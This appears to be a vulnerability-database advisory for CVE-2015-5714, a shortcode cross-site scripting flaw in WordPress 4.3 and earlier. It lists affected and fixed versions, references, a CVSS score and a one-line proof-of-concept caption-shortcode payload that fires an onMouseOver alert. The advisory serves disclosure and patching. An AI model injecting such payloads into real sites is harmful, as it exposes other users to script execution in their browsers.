WordPress Vulnerabilities

WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)

Proof of Concept

The following payload placed in a page or post (does not work in comments):

TEST!!![caption width="1" caption='<a href="' ">]</a><a href="http://onMouseOver='alert(1)'">Click me</a>

Affects WordPress

3.8.1
Fixed in WordPress 3.8.11
3.8
Fixed in WordPress 3.8.11
3.7.1
Fixed in WordPress 3.7.11
3.9
Fixed in WordPress 3.9.9
3.9.1
Fixed in WordPress 3.9.9
3.7
Fixed in WordPress 3.7.11
3.8.2
Fixed in WordPress 3.8.11
3.8.3
Fixed in WordPress 3.8.11
3.9.2
Fixed in WordPress 3.9.9
4.0
Fixed in WordPress 4.0.8
4.1
Fixed in WordPress 4.1.8
4.1.1
Fixed in WordPress 4.1.8
4.2
Fixed in WordPress 4.2.5
3.9.3
Fixed in WordPress 3.9.9
4.1.2
Fixed in WordPress 4.1.8
4.2.1
Fixed in WordPress 4.2.5
4.0.1
Fixed in WordPress 4.0.8
4.1.5
Fixed in WordPress 4.1.8
4.1.4
Fixed in WordPress 4.1.8
4.1.3
Fixed in WordPress 4.1.8
3.8.4
Fixed in WordPress 3.8.11
3.7.4
Fixed in WordPress 3.7.11
4.2.3
Fixed in WordPress 4.2.5
3.8.8
Fixed in WordPress 3.8.11
3.8.5
Fixed in WordPress 3.8.11
3.8.6
Fixed in WordPress 3.8.11
3.8.7
Fixed in WordPress 3.8.11
3.7.2
Fixed in WordPress 3.7.11
3.7.3
Fixed in WordPress 3.7.11
3.7.5
Fixed in WordPress 3.7.11
3.7.6
Fixed in WordPress 3.7.11
3.7.7
Fixed in WordPress 3.7.11
3.7.8
Fixed in WordPress 3.7.11
3.7.9
Fixed in WordPress 3.7.11
3.8.9
Fixed in WordPress 3.8.11
3.9.4
Fixed in WordPress 3.9.9
3.9.5
Fixed in WordPress 3.9.9
3.9.6
Fixed in WordPress 3.9.9
3.9.7
Fixed in WordPress 3.9.9
4.0.2
Fixed in WordPress 4.0.8
4.0.3
Fixed in WordPress 4.0.8
4.0.4
Fixed in WordPress 4.0.8
4.0.5
Fixed in WordPress 4.0.8
4.0.6
Fixed in WordPress 4.0.8
4.1.6
Fixed in WordPress 4.1.8
4.2.2
Fixed in WordPress 4.2.5
4.2.4
Fixed in WordPress 4.2.5
4.1.7
Fixed in WordPress 4.1.8
4.0.7
Fixed in WordPress 4.0.8
3.9.8
Fixed in WordPress 3.9.9
3.8.10
Fixed in WordPress 3.8.11
3.7.10
Fixed in WordPress 3.7.11
4.3
Fixed in WordPress 4.3.1

References

CVE
CVE-2015-5714
URL
https://wordpress.org/news/2015/09/wordpress-4-3-1/
URL
https://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
URL
http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Submitter
ethicalhack3r
Submitter twitter
ethicalhack3r
Verified
Yes
WPVDB ID
5c59d5d8-e7aa-4252-b878-d7d3091eeb35

Timeline

Publicly Published
2015-09-15 (about 8 years ago)
Added
2015-09-15 (about 8 years ago)
Last Updated
2020-09-22 (about 3 years ago)

Other

Published
Title
Published
2015-03-09
Title
Pie Register <= 2.0.14 - Cross-Site Scripting (XSS)
Published
2023-02-13
Title
WordPress Social Login and Register < 7.6.1 - Unauthenticated Arbitrary Content Deletion
Published
2023-09-19
Title
WordPress Charts < 0.7.0 - Contributor+ Stored XSS
Published
2023-11-07
Title
ANAC XML Bandi di Gara <= 7.5 - Authenticated (Editor+) Stored Cross-Site Scripting
Published
2023-05-11
Title
Add Posts to Pages <= 1.4.1 - Contributor+ Stored XSS